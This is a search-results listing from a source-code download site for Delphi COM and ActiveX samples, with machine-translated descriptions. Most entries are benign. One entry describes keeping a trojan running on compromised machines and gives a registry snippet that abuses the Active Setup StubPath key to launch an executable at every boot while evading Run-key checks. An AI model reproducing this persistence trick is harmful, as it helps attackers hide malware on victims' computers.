Hot Search : Source embeded web remote control p2p game More...
Location : Home Search - delphi code
Search - delphi code - List
对于activex控件的动态调用,而不是使用在delphi中注册的方法。这是一段试验程序。调用程序中的代码比较重要,实现这个功能。其余的几个都是测试的ActiveX控件。那个“数据集操作的ActiveForm”使用的是sqlserver的NorthWind的数据库,各位自己在AdoConnection里面重新设置一下就可以了。这段代码主要是尝试如何设置/获取 ActiveX控件的属性,调用ActiveX控件中带参数的方法等。-for dynamic call, rather than using the Delphi method were registered. This is a period of trial procedures. Call procedure code more important, to achieve this function. The remaining few are testing the ActiveX control. That "data sets to operate ActiveForm" using the SQLServer the NorthW ind database, you AdoConnection inside his re-installed on about it. This code is mainly to try to how to set up / ActiveX control access to the property, Call ActiveX control with parameter of the method.
Date : 2008-10-13 Size : 901.77kb User : 孙英佶

通过COM+组件完成文件的传送功能,包含:COM+服务的示例代码和客户端的示例代码。-through COM completed document delivery functions, including : COM+ services sample code and examples of client code.
Date : 2025-12-16 Size : 1.73mb User : 赵洪笙

windows平台com服务,只要在Window平台所有的开发语言都可以调用此服务. Client: 调用Com组件的方法代码 com安装: BASE64组件服务导出安装 Server: BASE64组件的代码-windows platform com services, as long as the Window platform for the development of all languages can call this service. Client : Call Com components of the installation code com : BASE64 components derived installation services Server : BASE64 Component code
Date : 2025-12-16 Size : 655kb User : 黄磊

对于activex控件的动态调用,而不是使用在delphi中注册的方法。这是一段试验程序。调用程序中的代码比较重要,实现这个功能。其余的几个都是测试的ActiveX控件。那个“数据集操作的ActiveForm”使用的是sqlserver的NorthWind的数据库,各位自己在AdoConnection里面重新设置一下就可以了。这段代码主要是尝试如何设置/获取 ActiveX控件的属性,调用ActiveX控件中带参数的方法等。-for dynamic call, rather than using the Delphi method were registered. This is a period of trial procedures. Call procedure code more important, to achieve this function. The remaining few are testing the ActiveX control. That "data sets to operate ActiveForm" using the SQLServer the NorthW ind database, you AdoConnection inside his re-installed on about it. This code is mainly to try to how to set up/ActiveX control access to the property, Call ActiveX control with parameter of the method.
Date : 2025-12-16 Size : 902kb User : 孙英佶

基于Exe的Com服务器,本例子是Delphi的代码,我想很多人都有这个想法-Exe of the Com-based servers, this example is the Delphi code, I think many people have this idea
Date : 2025-12-16 Size : 471kb User : 小冰

用delphi调用word来进行语法检查还有拼写检查,很有用并且实用的代码,-Use delphi to call the word grammar check there spelling checker, useful and practical code,
Date : 2025-12-16 Size : 11kb User : iamyg

delphi com技术应用的源代码。有助于初级入门的学习者学习com技术。-delphi com technology applications source code. Contribute to the initial entry of learners studying com technology.
Date : 2025-12-16 Size : 1.17mb User : 刘明勋

开发的一个和呼叫中心平台进行通信的OCX控件,支持 登录,退出,置忙、置闲,拨号,转移,音乐保持等功能-the ocx souce code of Callcenter
Date : 2025-12-16 Size : 308kb User : 勤奋

一個可讓 Delphi 展現 Flash and ActiveX 強大的功能, 含源碼, 適用於 Delphi 5, 6, 7.-This is a strong functions, it makse Flash and ActiveX in Delphi Tool, (Source Code included) For Delphi 5, 6, 7.
Date : 2025-12-16 Size : 50kb User : john

ActiveX 自启动方式有很多木马在使用,好象国内的比较少,最近突然多起来了 由于我一向在 网吧上网,内网肉鸡通常是上不了线的,所以需要端口映射,于是我在几台服务器肉鸡上装了 Vidc 这个东西,可惜 vidc 1.2 服务端是不会自己启动的,所以就需要动手改造。随便研究了一下,呵呵。安装为服务?注册表Run键? [attach=130] 可惜现在是个鸟,无论 老鸟还是菜鸟都喜欢去查看这几个地方,加是什么 优化大师 的帮助,很快,改造的木马over了,其实我们不妨使用下 ActiveX 详细信息看下面的代码 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{4A202188-F04D-11cf-64CD-31FFAFEECF20}] "StubPath"="sunray.exe" 其中的 {4A202188-F04D-11cf-64CD-31FFAFEECF20} 即为启动键值,可以随机替换为合理的值 把上面的代码保存为 run.reg 导入注册表,每次开机就会启动 系统目录下的 sunray.exe -There are many ways since the launch of ActiveX Trojan in use, if the domestic is relatively small, the recent sudden increased recently in As I have always been in the cafe Internet, Intranet chickens usually are not able to line, so the need for port mapping, so I have a few servers broiler upload a Vidc this thing, unfortunately vidc 1.2 server will not start their own, so we need to Hands-transformation. Casual study a little, He He. Installed as a service? Registry Run keys? [attach = 130] Unfortunately, now is a bird or a rookie like both fields and then go to see these places, plus What is the optimal master s help, quickly transform the Trojans over, but in fact we may use the following ActiveX For more information see the following code Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components (4A202188-F04D-11cf-64CD-31FFAFEECF20)] "StubPath" = "sunray.exe" Where (4A202188-F04D-11cf-64CD-31FFAFEECF20) shal
Date : 2025-12-16 Size : 3kb User : Gougou

Delphi COM编程GUIDDemo代码Delphi COM Programming GUIDDemo code -Delphi COM Programming GUIDDemo code
Date : 2025-12-16 Size : 2kb User : qo

Delphi COM编程AgentTest代码Delphi COM Programming AgentTest code -Delphi COM Programming AgentTest code
Date : 2025-12-16 Size : 2kb User : qo

Delphi COM编程GrphDemo代码Delphi COM Programming GrphDemo code -Delphi COM Programming GrphDemo code
Date : 2025-12-16 Size : 4kb User : qo

Delphi COM编程PartStock代码Delphi COM Programming PartStock code -Delphi COM Programming PartStock code
Date : 2025-12-16 Size : 4kb User : qo

Delphi COM编程LinkDemo代码Delphi COM Programming LinkDemo code -Delphi COM Programming LinkDemo code
Date : 2025-12-16 Size : 7kb User : .

Delphi COM编程FindProp代码Delphi COM Programming FindProp code -Delphi COM Programming FindProp code
Date : 2025-12-16 Size : 4kb User : .

Delphi activex source code
Date : 2025-12-16 Size : 440kb User : yujibey

清风sqlite 数据库插件!按键精灵插件,操作sqlite数据库,网络时间,网络ip等功能,delphi编写,不依赖其他dll,可以扩展,源码发布!-QuickMacro plug operation sqlite database, network time, network ip functions, delphi write, do not rely on other dll, can be extended, source code released!
Date : 2025-12-16 Size : 10kb User : 周清亮
CodeBus is one of the largest source code repositories on the Internet!
Contact us :
1999-2046 CodeBus All Rights Reserved.